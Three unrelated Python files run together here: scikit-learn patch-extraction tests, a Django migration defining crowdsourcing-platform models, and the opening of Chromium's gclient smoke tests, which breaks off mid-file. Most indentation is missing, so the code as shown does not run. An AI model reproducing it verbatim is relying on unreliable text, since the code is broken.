assert_raises(ValueError, extract_patches_2d, lena, (p_h, p_w),
max_patches=-1.0)
def test_reconstruct_patches_perfect():
lena = downsampled_lena
p_h, p_w = 16, 16
patches = extract_patches_2d(lena, (p_h, p_w))
lena_reconstructed = reconstruct_from_patches_2d(patches, lena.shape)
np.testing.assert_array_equal(lena, lena_reconstructed)
def test_reconstruct_patches_perfect_color():
lena = orange_lena
p_h, p_w = 16, 16
patches = extract_patches_2d(lena, (p_h, p_w))
lena_reconstructed = reconstruct_from_patches_2d(patches, lena.shape)
np.testing.assert_array_equal(lena, lena_reconstructed)
def test_patch_extractor_fit():
lenas = lena_collection
extr = PatchExtractor(patch_size=(8, 8), max_patches=100, random_state=0)
assert_true(extr == extr.fit(lenas))
def test_patch_extractor_max_patches():
lenas = lena_collection
i_h, i_w = lenas.shape[1:3]
p_h, p_w = 8, 8
max_patches = 100
expected_n_patches = len(lenas) * max_patches
extr = PatchExtractor(patch_size=(p_h, p_w), max_patches=max_patches,
random_state=0)
patches = extr.transform(lenas)
assert_true(patches.shape == (expected_n_patches, p_h, p_w))
max_patches = 0.5
expected_n_patches = len(lenas) * int((i_h - p_h + 1) * (i_w - p_w + 1)
* max_patches)
extr = PatchExtractor(patch_size=(p_h, p_w), max_patches=max_patches,
random_state=0)
patches = extr.transform(lenas)
assert_true(patches.shape == (expected_n_patches, p_h, p_w))
def test_patch_extractor_max_patches_default():
lenas = lena_collection
extr = PatchExtractor(max_patches=100, random_state=0)
patches = extr.transform(lenas)
assert_equal(patches.shape, (len(lenas) * 100, 12, 12))
def test_patch_extractor_all_patches():
lenas = lena_collection
i_h, i_w = lenas.shape[1:3]
p_h, p_w = 8, 8
expected_n_patches = len(lenas) * (i_h - p_h + 1) * (i_w - p_w + 1)
extr = PatchExtractor(patch_size=(p_h, p_w), random_state=0)
patches = extr.transform(lenas)
assert_true(patches.shape == (expected_n_patches, p_h, p_w))
def test_patch_extractor_color():
lenas = _make_images(orange_lena)
i_h, i_w = lenas.shape[1:3]
p_h, p_w = 8, 8
expected_n_patches = len(lenas) * (i_h - p_h + 1) * (i_w - p_w + 1)
extr = PatchExtractor(patch_size=(p_h, p_w), random_state=0)
patches = extr.transform(lenas)
assert_true(patches.shape == (expected_n_patches, p_h, p_w, 3))
def test_extract_patches_strided():
image_shapes_1D = [(10,), (10,), (11,), (10,)]
patch_sizes_1D = [(1,), (2,), (3,), (8,)]
patch_steps_1D = [(1,), (1,), (4,), (2,)]
expected_views_1D = [(10,), (9,), (3,), (2,)]
last_patch_1D = [(10,), (8,), (8,), (2,)]
image_shapes_2D = [(10, 20), (10, 20), (10, 20), (11, 20)]
patch_sizes_2D = [(2, 2), (10, 10), (10, 11), (6, 6)]
patch_steps_2D = [(5, 5), (3, 10), (3, 4), (4, 2)]
expected_views_2D = [(2, 4), (1, 2), (1, 3), (2, 8)]
last_patch_2D = [(5, 15), (0, 10), (0, 8), (4, 14)]
image_shapes_3D = [(5, 4, 3), (3, 3, 3), (7, 8, 9), (7, 8, 9)]
patch_sizes_3D = [(2, 2, 3), (2, 2, 2), (1, 7, 3), (1, 3, 3)]
patch_steps_3D = [(1, 2, 10), (1, 1, 1), (2, 1, 3), (3, 3, 4)]
expected_views_3D = [(4, 2, 1), (2, 2, 2), (4, 2, 3), (3, 2, 2)]
last_patch_3D = [(3, 2, 0), (1, 1, 1), (6, 1, 6), (6, 3, 4)]
image_shapes = image_shapes_1D + image_shapes_2D + image_shapes_3D
patch_sizes = patch_sizes_1D + patch_sizes_2D + patch_sizes_3D
patch_steps = patch_steps_1D + patch_steps_2D + patch_steps_3D
expected_views = expected_views_1D + expected_views_2D + expected_views_3D
last_patches = last_patch_1D + last_patch_2D + last_patch_3D
for (image_shape, patch_size, patch_step, expected_view,
last_patch) in zip(image_shapes, patch_sizes, patch_steps,
expected_views, last_patches):
image = np.arange(np.prod(image_shape)).reshape(image_shape)
patches = extract_patches(image, patch_shape=patch_size,
extraction_step=patch_step)
ndim = len(image_shape)
assert_true(patches.shape[:ndim] == expected_view)
last_patch_slices = [slice(i, i + j, None) for i, j in
zip(last_patch, patch_size)]
assert_true((patches[[slice(-1, None, None)] * ndim] ==
image[last_patch_slices].squeeze()).all())
def test_extract_patches_square():
# test same patch size for all dimensions
lena = downsampled_lena
i_h, i_w = lena.shape
p = 8
expected_n_patches = ((i_h - p + 1), (i_w - p + 1))
patches = extract_patches(lena, patch_shape=p)
assert_true(patches.shape == (expected_n_patches[0], expected_n_patches[1],
p, p))
def test_width_patch():
# width and height of the patch should be less than the image
x = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
assert_raises(ValueError, extract_patches_2d, x, (4, 1))
assert_raises(ValueError, extract_patches_2d, x, (1, 4))
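# Illustrative sketch (not part of the original test module): the patch-count
# arithmetic behind the expected_n_patches assertions above. With full overlap
# (step 1), an i_h x i_w image and p_h x p_w patches yield
# (i_h - p_h + 1) * (i_w - p_w + 1) patches; the sizes below are hypothetical.
def _example_patch_count():
    i_h, i_w = 256, 256
    p_h, p_w = 16, 16
    return (i_h - p_h + 1) * (i_w - p_w + 1)  # 241 * 241 == 58081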
if __name__ == '__main__':
import nose
nose.runmodule()
|
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
import oauth2client.django_orm
class Migration(migrations.Migration):
dependencies = [
('auth', '0006_require_contenttypes_0002'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='AccountModel',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=128)),
('type', models.CharField(max_length=16)),
('email', models.EmailField(max_length=254)),
('access_token', models.TextField(max_length=2048)),
('root', models.CharField(max_length=256)),
('is_active', models.IntegerField()),
('quota', models.BigIntegerField()),
('used_space', models.BigIntegerField()),
('assigned_space', models.BigIntegerField()),
('status', models.IntegerField(default=0)),
],
),
migrations.CreateModel(
name='ActivityLog',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('activity', models.CharField(max_length=512)),
('created_timestamp', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Address',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('street', models.CharField(max_length=128, error_messages={b'required': b'Please specify the street name!'})),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=128, error_messages={b'required': b'Please enter the category name!'})),
('deleted', models.BooleanField(default=False)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('parent', models.ForeignKey(to='crowdsourcing.Category', null=True)),
],
),
migrations.CreateModel(
name='City',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=64, error_messages={b'required': b'Please specify the city!'})),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Country',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=64, error_messages={b'required': b'Please specify the country!'})),
('code', models.CharField(max_length=8, error_messages={b'required': b'Please specify the country code!'})),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='CredentialsModel',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('credential', oauth2client.django_orm.CredentialsField(null=True)),
('account', models.ForeignKey(to='crowdsourcing.AccountModel')),
],
),
migrations.CreateModel(
name='Currency',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=32)),
('iso_code', models.CharField(max_length=8)),
('last_updated', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='FlowModel',
fields=[
('id', models.OneToOneField(primary_key=True, serialize=False, to=settings.AUTH_USER_MODEL)),
('flow', oauth2client.django_orm.FlowField(null=True)),
],
),
migrations.CreateModel(
name='Friendship',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('deleted', models.BooleanField(default=False)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Language',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=64, error_messages={b'required': b'Please specify the language!'})),
('iso_code', models.CharField(max_length=8)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Module',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=128, error_messages={b'required': b'Please enter the module name!'})),
('description', models.TextField(error_messages={b'required': b'Please enter the module description!'})),
('keywords', models.TextField()),
('status', models.IntegerField(default=1, choices=[(1, b'Created'), (2, b'In Review'), (3, b'In Progress'), (4, b'Finished')])),
('repetition', models.IntegerField()),
('module_timeout', models.IntegerField()),
('deleted', models.BooleanField(default=False)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='ModuleCategory',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('category', models.ForeignKey(to='crowdsourcing.Category')),
('module', models.ForeignKey(to='crowdsourcing.Module')),
],
),
migrations.CreateModel(
name='ModuleRating',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('value', models.IntegerField()),
('last_updated', models.DateTimeField(auto_now=True)),
('module', models.ForeignKey(to='crowdsourcing.Module')),
],
),
migrations.CreateModel(
name='ModuleReview',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('annonymous', models.BooleanField(default=False)),
('comments', models.TextField()),
('last_updated', models.DateTimeField(auto_now=True)),
('module', models.ForeignKey(to='crowdsourcing.Module')),
],
),
migrations.CreateModel(
name='PasswordResetModel',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('reset_key', models.CharField(max_length=40)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('user', models.OneToOneField(to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Project',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=128, error_messages={b'required': b'Please enter the project name!'})),
('start_date', models.DateTimeField(auto_now_add=True)),
('end_date', models.DateTimeField(auto_now_add=True)),
('description', models.CharField(default=b'', max_length=1024)),
('keywords', models.TextField()),
('deleted', models.BooleanField(default=False)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='ProjectCategory',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('category', models.ForeignKey(to='crowdsourcing.Category')),
('project', models.ForeignKey(to='crowdsourcing.Project')),
],
),
migrations.CreateModel(
name='ProjectRequester',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('project', models.ForeignKey(to='crowdsourcing.Project')),
],
),
migrations.CreateModel(
name='Qualification',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('type', models.IntegerField(default=1, choices=[(1, b'Strict'), (2, b'Flexible')])),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('module', models.ForeignKey(to='crowdsourcing.Module')),
],
),
migrations.CreateModel(
name='QualificationItem',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('attribute', models.CharField(max_length=128)),
('operator', models.CharField(max_length=128)),
('value1', models.CharField(max_length=128)),
('value2', models.CharField(max_length=128)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('qualification', models.ForeignKey(to='crowdsourcing.Qualification')),
],
),
migrations.CreateModel(
name='Region',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=64, error_messages={b'required': b'Please specify the region!'})),
('code', models.CharField(max_length=16, error_messages={b'required': b'Please specify the region code!'})),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='RegistrationModel',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('activation_key', models.CharField(max_length=40)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('user', models.OneToOneField(to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Requester',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
],
),
migrations.CreateModel(
name='RequesterRanking',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('requester_name', models.CharField(max_length=128)),
('requester_payRank', models.FloatField()),
('requester_fairRank', models.FloatField()),
('requester_speedRank', models.FloatField()),
('requester_communicationRank', models.FloatField()),
('requester_numberofReviews', models.IntegerField(default=0)),
],
),
migrations.CreateModel(
name='Role',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(unique=True, max_length=32, error_messages={b'unique': b'The role %(value)r already exists. Please provide another name!', b'required': b'Please specify the role name!'})),
('is_active', models.BooleanField(default=True)),
('deleted', models.BooleanField(default=False)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Skill',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=128, error_messages={b'required': b'Please enter the skill name!'})),
('description', models.CharField(max_length=512, error_messages={b'required': b'Please enter the skill description!'})),
('verified', models.BooleanField(default=False)),
('deleted', models.BooleanField(default=False)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('parent', models.ForeignKey(to='crowdsourcing.Skill', null=True)),
],
),
migrations.CreateModel(
name='Task',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('status', models.IntegerField(default=1, choices=[(1, b'Created'), (2, b'Accepted'), (3, b'Assigned'), (4, b'Finished')])),
('deleted', models.BooleanField(default=False)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('price', models.FloatField(default=0)),
('module', models.ForeignKey(to='crowdsourcing.Module')),
],
),
migrations.CreateModel(
name='TaskWorker',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('task', models.ForeignKey(to='crowdsourcing.Task')),
],
),
migrations.CreateModel(
name='TaskWorkerResult',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('result', models.TextField()),
('status', models.IntegerField(default=1, choices=[(1, b'Created'), (2, b'Accepted'), (3, b'Rejected')])),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('task_worker', models.ForeignKey(to='crowdsourcing.TaskWorker')),
],
),
migrations.CreateModel(
name='Template',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=128, error_messages={b'required': b'Please enter the template name!'})),
('source_html', models.TextField()),
('deleted', models.BooleanField(default=False)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('owner', models.ForeignKey(to='crowdsourcing.Requester')),
],
),
migrations.CreateModel(
name='TemplateItem',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=128, error_messages={b'required': b'Please enter the name of the template item!'})),
('deleted', models.BooleanField(default=False)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('template', models.ForeignKey(to='crowdsourcing.Template')),
],
),
migrations.CreateModel(
name='TemplateItemProperties',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('attribute', models.CharField(max_length=128)),
('operator', models.CharField(max_length=128)),
('value1', models.CharField(max_length=128)),
('value2', models.CharField(max_length=128)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('template_item', models.ForeignKey(to='crowdsourcing.TemplateItem')),
],
),
migrations.CreateModel(
name='TemporaryFlowModel',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('type', models.CharField(max_length=16)),
('email', models.EmailField(max_length=254)),
('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='UserCountry',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('country', models.ForeignKey(to='crowdsourcing.Country')),
],
),
migrations.CreateModel(
name='UserLanguage',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('language', models.ForeignKey(to='crowdsourcing.Language')),
],
),
migrations.CreateModel(
name='UserPreferences',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('login_alerts', models.SmallIntegerField(default=0)),
('last_updated', models.DateTimeField(auto_now=True)),
('currency', models.ForeignKey(to='crowdsourcing.Currency')),
('language', models.ForeignKey(to='crowdsourcing.Language')),
('user', models.OneToOneField(to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='UserProfile',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('gender', models.CharField(max_length=1, choices=[(b'M', b'Male'), (b'F', b'Female')])),
('birthday', models.DateField(null=True, error_messages={b'invalid': b'Please enter a correct date format'})),
('verified', models.BooleanField(default=False)),
('picture', models.BinaryField(null=True)),
('deleted', models.BooleanField(default=False)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('worker_alias', models.CharField(max_length=32, error_messages={b'required': b'Please enter an alias!'})),
('requester_alias', models.CharField(max_length=32, error_messages={b'required': b'Please enter an alias!'})),
('address', models.ForeignKey(to='crowdsourcing.Address', null=True)),
('friends', models.ManyToManyField(to='crowdsourcing.UserProfile', through='crowdsourcing.Friendship')),
('languages', models.ManyToManyField(to='crowdsourcing.Language', through='crowdsourcing.UserLanguage')),
('nationality', models.ManyToManyField(to='crowdsourcing.Country', through='crowdsourcing.UserCountry')),
],
),
migrations.CreateModel(
name='UserRole',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('role', models.ForeignKey(to='crowdsourcing.Role')),
('user_profile', models.ForeignKey(to='crowdsourcing.UserProfile')),
],
),
migrations.CreateModel(
name='Worker',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('deleted', models.BooleanField(default=False)),
('profile', models.OneToOneField(to='crowdsourcing.UserProfile')),
],
),
migrations.CreateModel(
name='WorkerModuleApplication',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('status', models.IntegerField(default=1, choices=[(1, b'Created'), (2, b'Accepted'), (3, b'Rejected')])),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('module', models.ForeignKey(to='crowdsourcing.Module')),
('worker', models.ForeignKey(to='crowdsourcing.Worker')),
],
),
migrations.CreateModel(
name='WorkerSkill',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('level', models.IntegerField(null=True)),
('verified', models.BooleanField(default=False)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('skill', models.ForeignKey(to='crowdsourcing.Skill')),
('worker', models.ForeignKey(to='crowdsourcing.Worker')),
],
),
migrations.AddField(
model_name='worker',
name='skills',
field=models.ManyToManyField(to='crowdsourcing.Skill', through='crowdsourcing.WorkerSkill'),
),
migrations.AddField(
model_name='userprofile',
name='roles',
field=models.ManyToManyField(to='crowdsourcing.Role', through='crowdsourcing.UserRole'),
),
migrations.AddField(
model_name='userprofile',
name='user',
field=models.OneToOneField(to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='userlanguage',
name='user',
field=models.ForeignKey(to='crowdsourcing.UserProfile'),
),
migrations.AddField(
model_name='usercountry',
name='user',
field=models.ForeignKey(to='crowdsourcing.UserProfile'),
),
migrations.AddField(
model_name='taskworkerresult',
name='template_item',
field=models.ForeignKey(to='crowdsourcing.TemplateItem'),
),
migrations.AddField(
model_name='taskworker',
name='worker',
field=models.ForeignKey(to='crowdsourcing.Worker'),
),
migrations.AddField(
model_name='requester',
name='profile',
field=models.OneToOneField(to='crowdsourcing.UserProfile'),
),
migrations.AddField(
model_name='projectrequester',
name='requester',
field=models.ForeignKey(to='crowdsourcing.Requester'),
),
migrations.AddField(
model_name='project',
name='categories',
field=models.ManyToManyField(to='crowdsourcing.Category', through='crowdsourcing.ProjectCategory'),
),
migrations.AddField(
model_name='project',
name='collaborators',
field=models.ManyToManyField(to='crowdsourcing.Requester', through='crowdsourcing.ProjectRequester'),
),
migrations.AddField(
model_name='project',
name='owner',
field=models.ForeignKey(related_name='project_owner', to='crowdsourcing.Requester'),
),
migrations.AddField(
model_name='modulereview',
name='worker',
field=models.ForeignKey(to='crowdsourcing.Worker'),
),
migrations.AddField(
model_name='modulerating',
name='worker',
field=models.ForeignKey(to='crowdsourcing.Worker'),
),
migrations.AddField(
model_name='module',
name='categories',
field=models.ManyToManyField(to='crowdsourcing.Category', through='crowdsourcing.ModuleCategory'),
),
migrations.AddField(
model_name='module',
name='owner',
field=models.ForeignKey(to='crowdsourcing.Requester'),
),
migrations.AddField(
model_name='module',
name='project',
field=models.ForeignKey(to='crowdsourcing.Project'),
),
migrations.AddField(
model_name='friendship',
name='user_source',
field=models.ForeignKey(related_name='user_source', to='crowdsourcing.UserProfile'),
),
migrations.AddField(
model_name='friendship',
name='user_target',
field=models.ForeignKey(related_name='user_target', to='crowdsourcing.UserProfile'),
),
migrations.AddField(
model_name='country',
name='region',
field=models.ForeignKey(to='crowdsourcing.Region'),
),
migrations.AddField(
model_name='city',
name='country',
field=models.ForeignKey(to='crowdsourcing.Country'),
),
migrations.AddField(
model_name='address',
name='city',
field=models.ForeignKey(to='crowdsourcing.City'),
),
migrations.AddField(
model_name='address',
name='country',
field=models.ForeignKey(to='crowdsourcing.Country'),
),
migrations.AddField(
model_name='activitylog',
name='author',
field=models.ForeignKey(to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='accountmodel',
name='owner',
field=models.ForeignKey(to=settings.AUTH_USER_MODEL),
),
migrations.AlterUniqueTogether(
name='projectcategory',
unique_together=set([('project', 'category')]),
),
migrations.AlterUniqueTogether(
name='modulereview',
unique_together=set([('worker', 'module')]),
),
migrations.AlterUniqueTogether(
name='modulerating',
unique_together=set([('worker', 'module')]),
),
migrations.AlterUniqueTogether(
name='modulecategory',
unique_together=set([('category', 'module')]),
),
]
|
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Smoke tests for gclient.py.
Shell out 'gclient' and run basic conformance tests.
This test assumes GClientSmokeBase.URL_BASE is valid.
"""
import logging
import os
import re
import subprocess
import sys
import unittest
ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0, ROOT_DIR)
import gclient_utils
import scm as gclient_scm
import subprocess2
from testing_support import fake_repos
from testing_support.fake_repos import join, write
GCLIENT_PATH = os.path.join(ROOT_DIR, 'gclient')
COVERAGE = False
class GClientSmokeBase(fake_repos.FakeReposTestBase):
def setUp(self):
super(GClientSmokeBase, self).setUp()
# Make sure it doesn't try to auto update when testing!
self.env = os.environ.copy()
self.env['DEPOT_TOOLS_UPDATE'] = '0'
def gclient(self, cmd, cwd=None):
if not cwd:
cwd = self.root_dir
if COVERAGE:
# Don't use the wrapper script.
cmd_base = ['coverage', 'run', '-a', GCLIENT_PATH + '.py']
else:
cmd_base = [GCLIENT_PATH]
cmd = cmd_base + cmd
process = subprocess.Popen(cmd, cwd=cwd, env=self.env,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
shell=sys.platform.startswith('win'))
(stdout, stderr) = process.communicate()
logging.debug("XXX: %s\n%s\nXXX" % (' '.join(cmd), stdout))
logging.debug("YYY: %s\n%s\nYYY" % (' '.join(cmd), stderr))
# pylint: disable=E1103
return (stdout.replace('\r\n', '\n'), stderr.replace('\r\n', '\n'),
process.returncode)
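  # A brief sketch of what untangle() below does (hypothetical sample output,
  # not taken from a real run): with --jobs > 1 gclient prefixes each line
  # with "<task number>>", so interleaved output such as
  #   1>________ running 'foo' in '/bar'
  #   2>________ running 'baz' in '/bar'
  #   1>done
  # is regrouped by task number (in sorted order); unprefixed lines are only
  # expected after all prefixed ones and are appended at the end.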
def untangle(self, stdout):
tasks = {}
remaining = []
for line in stdout.splitlines(False):
m = re.match(r'^(\d)+>(.*)$', line)
if not m:
remaining.append(line)
else:
self.assertEquals([], remaining)
tasks.setdefault(int(m.group(1)), []).append(m.group(2))
out = []
for key in sorted(tasks.iterkeys()):
out.extend(tasks[key])
out.extend(remaining)
return '\n'.join(out)
def parseGclient(self, cmd, items, expected_stderr='', untangle=False):
"""Parse gclient's output to make it easier to test.
If untangle is True, tries to sort out the output from parallel checkout."""
(stdout, stderr, returncode) = self.gclient(cmd)
if untangle:
stdout = self.untangle(stdout)
self.checkString(expected_stderr, stderr)
self.assertEquals(0, returncode)
return self.checkBlock(stdout, items)
def splitBlock(self, stdout):
"""Split gclient's output into logical execution blocks.
___ running 'foo' at '/bar'
(...)
___ running 'baz' at '/bar'
(...)
will result in 2 items of len((...).splitlines()) each.
"""
results = []
for line in stdout.splitlines(False):
# Intentionally skips empty lines.
if not line:
continue
if line.startswith('__'):
match = re.match(r'^________ ([a-z]+) \'(.*)\' in \'(.*)\'$', line)
if not match:
match = re.match(r'^_____ (.*) is missing, synching instead$', line)
if match:
            # This happens when a dependency is deleted; we should probably not
            # output this message.
results.append([line])
elif (
not re.match(
r'_____ [^ ]+ : Attempting rebase onto [0-9a-f]+...',
line) and
not re.match(r'_____ [^ ]+ at [^ ]+', line)):
          # The two regexps above are a bit too broad; they are necessary only
          # for git checkouts.
self.fail(line)
else:
results.append([[match.group(1), match.group(2), match.group(3)]])
else:
if not results:
# TODO(maruel): gclient's git stdout is inconsistent.
# This should fail the test instead!!
pass
else:
results[-1].append(line)
return results
def checkBlock(self, stdout, items):
results = self.splitBlock(stdout)
for i in xrange(min(len(results), len(items))):
if isinstance(items[i], (list, tuple)):
verb = items[i][0]
path = items[i][1]
else:
verb = items[i]
path = self.root_dir
self.checkString(results[i][0][0], verb, (i, results[i][0][0], verb))
if sys.platform == 'win32':
# Make path lower case since casing can change randomly.
self.checkString(
results[i][0][2].lower(),
path.lower(),
(i, results[i][0][2].lower(), path.lower()))
else:
self.checkString(results[i][0][2], path, (i, results[i][0][2], path))
self.assertEquals(len(results), len(items), (stdout, items, len(results)))
return results
@staticmethod
def svnBlockCleanup(out):
"""Work around svn status difference between svn 1.5 and svn 1.6
I don't know why but on Windows they are reversed. So sorts the items."""
for i in xrange(len(out)):
if len(out[i]) < 2:
continue
out[i] = [out[i][0]] + sorted([x[1:].strip() for x in out[i][1:]])
return out
class GClientSmoke(GClientSmokeBase):
"""Doesn't require either svnserve nor git-daemon."""
@property
def svn_base(self):
return 'svn://random.server/svn/'
@property
def git_base(self):
return 'git://random.server/git/'
def testHelp(self):
"""testHelp: make sure no new command was added."""
result = self.gclient(['help'])
# Roughly, not too short, not too long.
self.assertTrue(1000 < len(result[0]) and len(result[0]) < 2300,
'Too much written to stdout: %d bytes' % len(result[0]))
self.assertEquals(0, len(result[1]))
self.assertEquals(0, result[2])
def testUnknown(self):
result = self.gclient(['foo'])
# Roughly, not too short, not too long.
self.assertTrue(1000 < len(result[0]) and len(result[0]) < 2300,
'Too much written to stdout: %d bytes' % len(result[0]))
self.assertEquals(0, len(result[1]))
self.assertEquals(0, result[2])
def testNotConfigured(self):
